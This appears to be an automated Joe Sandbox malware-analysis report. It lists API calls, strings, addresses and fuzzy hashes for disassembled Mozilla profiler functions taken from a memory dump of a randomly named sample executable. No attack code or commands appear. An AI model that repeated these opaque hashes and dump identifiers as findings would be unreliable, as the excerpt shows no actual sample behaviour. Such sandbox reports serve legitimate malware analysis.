Instruction Fuzzy Hash: 7A717D71E112198FCF18CF99D8905EDBBB6FF89314F24816ED426AB740D731A946CB90

Function 6C9F58E0 Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: Process$CurrentTerminate
String ID:
API String ID: 2429186680-0
Opcode ID: a4d48a3e5023aca02107205f591da7b97010c5083f277c1f4972203e60a3797b
Instruction ID: 7c43ddebd298453d19c7665258e5ac95d5697fcf4c796192648a7599d73f275e
Opcode Fuzzy Hash: a4d48a3e5023aca02107205f591da7b97010c5083f277c1f4972203e60a3797b
Instruction Fuzzy Hash: BD819E75A012199FCB04CFA8D8809EEBBF6FF89314F648269D421BB741D731E946CB90

Function 6C9FCC00 Relevance: 76.7, APIs: 25, Strings: 26, Instructions: 233stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C9C582D), ref: 6C9FCC27
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C9C582D), ref: 6C9FCC3D
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6CA2FE98,?,?,?,?,?,6C9C582D), ref: 6C9FCC56
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C9C582D), ref: 6C9FCC6C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C9C582D), ref: 6C9FCC82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C9C582D), ref: 6C9FCC98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C9C582D), ref: 6C9FCCAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C9FCCC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C9FCCDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C9FCCEC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C9FCCFE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C9FCD14
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C9FCD82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C9FCD98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C9FCDAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C9FCDC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C9FCDDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C9FCDF0
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C9FCE06
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C9FCE1C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C9FCE32
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C9FCE48
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C9FCE5E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C9FCE74
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C9FCE8A

Strings

processcpu, xrefs: 6C9FCE6E
screenshots, xrefs: 6C9FCCD4
power, xrefs: 6C9FCE84
QCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafu, xrefs: 6C9FCD25
java, xrefs: 6C9FCC37
samplingallthreads, xrefs: 6C9FCE2C
stackwalk, xrefs: 6C9FCCF8
nostacksampling, xrefs: 6C9FCD7C
fileioall, xrefs: 6C9FCCA8
audiocallbacktracing, xrefs: 6C9FCDD4
preferencereads, xrefs: 6C9FCD92
default, xrefs: 6C9FCC21
leaf, xrefs: 6C9FCC66
jsallocations, xrefs: 6C9FCD0E
mainthreadio, xrefs: 6C9FCC7C
markersallthreads, xrefs: 6C9FCE42
ipcmessages, xrefs: 6C9FCDBE
cpuallthreads, xrefs: 6C9FCE16
fileio, xrefs: 6C9FCC92
TwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.ex, xrefs: 6C9FCF3B
unregisteredthreads, xrefs: 6C9FCE58
Unrecognized feature "%s"., xrefs: 6C9FCEA0
nativeallocations, xrefs: 6C9FCDA8
noiostacks, xrefs: 6C9FCCBE
notimerresolutionchange, xrefs: 6C9FCE00
seqstyle, xrefs: 6C9FCCE6

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: strcmp
String ID: Unrecognized feature "%s".$QCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafu$TwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.exedaKNKHHvzQCYFIafuTwTlT.ex$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
API String ID: 1004003707-186924141
Opcode ID: 476374f60e9ee98074c2463cea299f108238adbcf05c2b1f812b3eaf0d8fe21f
Instruction ID: dffd9323e9ce0c861b7b97f53a072ea44588321a2b1469636e3430bfcc0f912d
Opcode Fuzzy Hash: 476374f60e9ee98074c2463cea299f108238adbcf05c2b1f812b3eaf0d8fe21f
Instruction Fuzzy Hash: 845197C1A0523516FB2431155E20BEE5408FF5224EF18983AED29A1E80FA09D68F87F7

Function 6C9C47C0 Relevance: 49.2, APIs: 23, Strings: 5, Instructions: 232threadCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C9C4801
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C9C4817
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C9C482D
__Init_thread_footer.LIBCMT ref: 6C9C484A

Part of subcall function 6C9EAB3F: EnterCriticalSection.KERNEL32(6CA3E370,?,?,6C9B3527,6CA3F6CC,?,?,?,?,?,?,?,?,6C9B3284), ref: 6C9EAB49
Part of subcall function 6C9EAB3F: LeaveCriticalSection.KERNEL32(6CA3E370,?,6C9B3527,6CA3F6CC,?,?,?,?,?,?,?,?,6C9B3284,?,?,6C9D56F6), ref: 6C9EAB7C

GetCurrentThreadId.KERNEL32 ref: 6C9C485F
GetCurrentThreadId.KERNEL32 ref: 6C9C487E
AcquireSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9C488B
free.MOZGLUE(?), ref: 6C9C493A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C9C4956
free.MOZGLUE(00000000), ref: 6C9C4960
ReleaseSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9C499A

Part of subcall function 6C9EAB89: EnterCriticalSection.KERNEL32(6CA3E370,?,?,?,6C9B34DE,6CA3F6CC,?,?,?,?,?,?,?,6C9B3284), ref: 6C9EAB94
Part of subcall function 6C9EAB89: LeaveCriticalSection.KERNEL32(6CA3E370,?,6C9B34DE,6CA3F6CC,?,?,?,?,?,?,?,6C9B3284,?,?,6C9D56F6), ref: 6C9EABD1

free.MOZGLUE(?), ref: 6C9C49C6
free.MOZGLUE(?), ref: 6C9C49E9

Part of subcall function 6C9D5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C9D5EDB
Part of subcall function 6C9D5E90: memset.VCRUNTIME140(6CA17765,000000E5,55CCCCCC), ref: 6C9D5F27
Part of subcall function 6C9D5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C9D5FB2

Strings

MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C9C4812
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C9C47FC
MOZ_PROFILER_SHUTDOWN, xrefs: 6C9C4A42
[I %d/%d] profiler_shutdown, xrefs: 6C9C4A06
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C9C4828

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: CriticalSection$free$EnterLeavegetenv$CurrentExclusiveLockThread$AcquireInit_thread_footerReleasememset
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_SHUTDOWN$[I %d/%d] profiler_shutdown
API String ID: 1340022502-4194431170
Opcode ID: 436d6587f04e6fa962f0cdaa09319857840394db643097a210ced8d3c9eb56fc
Instruction ID: da43830e7f5ba1fb3a99247426f36494e6ee6995a253af0d95ccd7a51273df39
Opcode Fuzzy Hash: 436d6587f04e6fa962f0cdaa09319857840394db643097a210ced8d3c9eb56fc
Instruction Fuzzy Hash: 34812471B002128FDB289F28DCA477A3775AF52318F144269E91AD7B42D730E846CFA7

Function 6C9C4470 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 178libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C9C4730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C9C44B2,6CA3E21C,6CA3F7F8), ref: 6C9C473E
Part of subcall function 6C9C4730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C9C474A

GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C9C44BA
LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C9C44D2
InitOnceExecuteOnce.KERNEL32(6CA3F80C,6C9BF240,?,?), ref: 6C9C451A
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C9C455C
LoadLibraryW.KERNEL32(?), ref: 6C9C4592
InitializeCriticalSection.KERNEL32(6CA3F770), ref: 6C9C45A2
moz_xmalloc.MOZGLUE(00000008), ref: 6C9C45AA
moz_xmalloc.MOZGLUE(00000018), ref: 6C9C45BB
InitOnceExecuteOnce.KERNEL32(6CA3F818,6C9BF240,?,?), ref: 6C9C4612
?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C9C4636
LoadLibraryW.KERNEL32(user32.dll), ref: 6C9C4644
memset.VCRUNTIME140(?,00000000,00000114), ref: 6C9C466D
VerSetConditionMask.NTDLL ref: 6C9C469F
VerSetConditionMask.NTDLL ref: 6C9C46AB
VerSetConditionMask.NTDLL ref: 6C9C46B2
VerSetConditionMask.NTDLL ref: 6C9C46B9
VerSetConditionMask.NTDLL ref: 6C9C46C0
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C9C46CD
GetModuleHandleW.KERNEL32(00000000), ref: 6C9C46F1
GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C9C46FD

Strings

WRusr.dll, xrefs: 6C9C44B5
kernel32.dll, xrefs: 6C9C44CD
l, xrefs: 6C9C4578
user32.dll, xrefs: 6C9C4557, 6C9C463F
NativeNtBlockSet_Write, xrefs: 6C9C46F7

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
String ID: NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
API String ID: 1702738223-3894940629
Opcode ID: c1ff1ed0b2bbaf8dbbaa1d2e358237f2f6cb2d254915e05c5c55a682da405780
Instruction ID: 2aa7731afe59d0d506b33eec83699b9a62a1c1cef0ea08834d5ce1c8e02c10f9
Opcode Fuzzy Hash: c1ff1ed0b2bbaf8dbbaa1d2e358237f2f6cb2d254915e05c5c55a682da405780
Instruction Fuzzy Hash: A361C1B0700355AFEB289F64DC19BA57BB8EB46308F14C59CE908DB641D774C986CFA2

Function 6C9FE8B0 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 297threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C9F7090: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,00000000,?,6C9FB9F1,?), ref: 6C9F7107

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C9FDCF5), ref: 6C9FE92D
GetCurrentThreadId.KERNEL32 ref: 6C9FEA4F
AcquireSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9FEA5C
ReleaseSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9FEA80
GetCurrentThreadId.KERNEL32 ref: 6C9FEA8A
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C9FDCF5), ref: 6C9FEA92
GetCurrentThreadId.KERNEL32 ref: 6C9FEB11
AcquireSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9FEB1E
memset.VCRUNTIME140(?,00000000,000000E0), ref: 6C9FEB3C
ReleaseSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9FEB5B

Part of subcall function 6C9F5710: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C9FEB71), ref: 6C9F57AB

Part of subcall function 6C9ECBE8: GetCurrentProcess.KERNEL32(?,6C9B31A7), ref: 6C9ECBF1
Part of subcall function 6C9ECBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C9B31A7), ref: 6C9ECBFA

Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C9C4A68), ref: 6C9F945E
Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C9F9470
Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C9F9482
Part of subcall function 6C9F9420: __Init_thread_footer.LIBCMT ref: 6C9F949F

GetCurrentThreadId.KERNEL32 ref: 6C9FEBA4
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6C9FEBAC

Part of subcall function 6C9F94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C9F94EE
Part of subcall function 6C9F94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C9F9508

GetCurrentThreadId.KERNEL32 ref: 6C9FEBC1
AcquireSRWLockExclusive.KERNEL32(6CA3F4B8,?,?,00000000), ref: 6C9FEBCE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6C9FEBE5
ReleaseSRWLockExclusive.KERNEL32(6CA3F4B8,00000000), ref: 6C9FEC37
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C9FEC46
CloseHandle.KERNEL32(?), ref: 6C9FEC55
free.MOZGLUE(00000000), ref: 6C9FEC5C

Strings

[I %d/%d] profiler_start, xrefs: 6C9FEBB4
[I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6C9FEA9B

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: ExclusiveLock$Current$ReleaseThread$Acquiregetenv$Process_getpid$?profiler_init@baseprofiler@mozilla@@CloseHandleInit_thread_footerObjectSingleTerminateWait__acrt_iob_func__stdio_common_vfprintffreemallocmemset
String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
API String ID: 1341148965-1186885292
Opcode ID: dc58c3647a4762ce579804b51b51ade4bdbd6cc4708674ac57e66f90415b7cf8
Instruction ID: 8f13cafc5bc3cb9b4640321f0fb9de185e7e4f6c02be12245ed2eb88c17aa2d2
Opcode Fuzzy Hash: dc58c3647a4762ce579804b51b51ade4bdbd6cc4708674ac57e66f90415b7cf8
Instruction Fuzzy Hash: 74A120316017158FCB289F18DC64BAA77B6EB96308F14812EE96DC7B41DB30D847CBA1

Function 6C9FF6E0 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 235threadstringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C9C4A68), ref: 6C9F945E
Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C9F9470
Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C9F9482
Part of subcall function 6C9F9420: __Init_thread_footer.LIBCMT ref: 6C9F949F

GetCurrentThreadId.KERNEL32 ref: 6C9FF70E
??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C9FF8F9

Part of subcall function 6C9C6390: GetCurrentThreadId.KERNEL32 ref: 6C9C63D0
Part of subcall function 6C9C6390: AcquireSRWLockExclusive.KERNEL32 ref: 6C9C63DF
Part of subcall function 6C9C6390: ReleaseSRWLockExclusive.KERNEL32 ref: 6C9C640E

ReleaseSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9FF93A
GetCurrentThreadId.KERNEL32 ref: 6C9FF98A
GetCurrentThreadId.KERNEL32 ref: 6C9FF990
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9FF994
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9FF716

Part of subcall function 6C9F94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C9F94EE
Part of subcall function 6C9F94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C9F9508

Part of subcall function 6C9BB5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6C9BB5E0

GetCurrentThreadId.KERNEL32 ref: 6C9FF739
AcquireSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9FF746
GetCurrentThreadId.KERNEL32 ref: 6C9FF793
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6CA3385B,00000002,?,?,?,?,?), ref: 6C9FF829
free.MOZGLUE(?,?,00000000,?), ref: 6C9FF84C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6C9FF866
free.MOZGLUE(?), ref: 6C9FFA0C

Part of subcall function 6C9C5E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C9C55E1), ref: 6C9C5E8C
Part of subcall function 6C9C5E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C9C5E9D
Part of subcall function 6C9C5E60: GetCurrentThreadId.KERNEL32 ref: 6C9C5EAB
Part of subcall function 6C9C5E60: GetCurrentThreadId.KERNEL32 ref: 6C9C5EB8
Part of subcall function 6C9C5E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C9C5ECF
Part of subcall function 6C9C5E60: moz_xmalloc.MOZGLUE(00000024), ref: 6C9C5F27
Part of subcall function 6C9C5E60: moz_xmalloc.MOZGLUE(00000004), ref: 6C9C5F47
Part of subcall function 6C9C5E60: GetCurrentProcess.KERNEL32 ref: 6C9C5F53
Part of subcall function 6C9C5E60: GetCurrentThread.KERNEL32 ref: 6C9C5F5C
Part of subcall function 6C9C5E60: GetCurrentProcess.KERNEL32 ref: 6C9C5F66
Part of subcall function 6C9C5E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C9C5F7E

free.MOZGLUE(?), ref: 6C9FF9C5
free.MOZGLUE(?), ref: 6C9FF9DA

Strings

Thread , xrefs: 6C9FF789
[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6C9FF9A6
[D %d/%d] profiler_register_thread(%s), xrefs: 6C9FF71F
" attempted to re-register as ", xrefs: 6C9FF858

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
API String ID: 882766088-1834255612
Opcode ID: 65dd08b734a8dcabf12a1dcaad22b33d0585a8c2a1d03f406d153e0be510b518
Instruction ID: 503408b613f8a1d4a6ffb41e332f8f5297d5c0905e95da3804988c1768aa773d
Opcode Fuzzy Hash: 65dd08b734a8dcabf12a1dcaad22b33d0585a8c2a1d03f406d153e0be510b518
Instruction Fuzzy Hash: 678157706047059FDB10DF24C840BAAB7F5FFA5308F05855DE89997B51EB30D84ACBA2

Function 6C9FEE40 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 166threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C9C4A68), ref: 6C9F945E
Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C9F9470
Part of subcall function 6C9F9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C9F9482
Part of subcall function 6C9F9420: __Init_thread_footer.LIBCMT ref: 6C9F949F

GetCurrentThreadId.KERNEL32 ref: 6C9FEE60
AcquireSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9FEE6D
ReleaseSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9FEE92
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C9FEEA5
CloseHandle.KERNEL32(?), ref: 6C9FEEB4
free.MOZGLUE(00000000), ref: 6C9FEEBB
GetCurrentThreadId.KERNEL32 ref: 6C9FEEC7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9FEECF

Part of subcall function 6C9FDE60: GetCurrentThreadId.KERNEL32 ref: 6C9FDE73
Part of subcall function 6C9FDE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C9C4A68), ref: 6C9FDE7B
Part of subcall function 6C9FDE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C9C4A68), ref: 6C9FDEB8
Part of subcall function 6C9FDE60: free.MOZGLUE(00000000,?,6C9C4A68), ref: 6C9FDEFE
Part of subcall function 6C9FDE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C9FDF38

Part of subcall function 6C9ECBE8: GetCurrentProcess.KERNEL32(?,6C9B31A7), ref: 6C9ECBF1
Part of subcall function 6C9ECBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C9B31A7), ref: 6C9ECBFA

GetCurrentThreadId.KERNEL32 ref: 6C9FEF1E
AcquireSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9FEF2B
